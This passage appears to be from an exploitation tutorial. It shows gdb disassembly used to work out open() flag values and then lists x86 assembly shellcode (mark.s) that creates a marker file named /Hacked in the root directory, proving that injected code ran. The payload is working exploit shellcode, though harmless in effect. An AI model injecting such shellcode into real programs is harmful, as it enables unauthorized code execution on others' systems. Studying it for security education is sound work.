0x080487ee <main+143>: mov DWORD PTR [esp+8],eax
0x080487f2 <main+147>: mov eax,DWORD PTR [ebp-16]
0x080487f5 <main+150>: mov DWORD PTR [esp+4],eax
0x080487f9 <main+154>: mov DWORD PTR [esp],0x8048ac7
0x08048800 <main+161>: call 0x8048490 <printf@plt>
0x08048805 <main+166>: mov DWORD PTR [esp+8],0x180
0x0804880d <main+174>: mov DWORD PTR [esp+4],0x441
0x08048815 <main+182>: mov eax,DWORD PTR [ebp-16]
0x08048818 <main+185>: mov DWORD PTR [esp],eax
0x0804881b <main+188>: call 0x8048410 <open@plt>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)
Remember that the arguments to a function call will be pushed to the
stack in reverse. In this case, the compiler decided to use mov DWORD PTR
[esp+offset], value_to_push_to_stack instead of push instructions, but the
structure built on the stack is equivalent. The first argument is a pointer to
the name of the file in EAX, the second argument (put at [esp+4]) is 0x441,
and the third argument (put at [esp+8]) is 0x180. This means that
O_WRONLY|O_CREAT|O_APPEND turns out to be 0x441 and S_IRUSR|S_IWUSR is 0x180.
The following shellcode uses these values to create a file called Hacked in
the root filesystem.
mark.s
BITS 32
; Mark the filesystem to prove you ran.
jmp short one
two:
  pop ebx                ; Filename
  xor ecx, ecx
  mov BYTE [ebx+7], cl   ; Null terminate filename
  push BYTE 0x5          ; Open()
  pop eax
  mov WORD cx, 0x441     ; O_WRONLY|O_APPEND|O_CREAT
  xor edx, edx
  mov WORD dx, 0x180     ; S_IRUSR|S_IWUSR
  int 0x80               ; Open file to create it.
                         ; eax = returned file descriptor
  mov ebx, eax           ; File descriptor is the first (and only) argument to close()
  push BYTE 0x6          ; Close()
  pop eax
  int 0x80               ; Close file.
  xor eax, eax
  mov ebx, eax           ; Exit status 0
  inc eax                ; Exit call.
  int 0x80               ; Exit(0), to avoid an infinite loop.
one:
  call two
  db "/HackedX"          ; The X at offset 7 is overwritten with a null byte above
  ;  01234567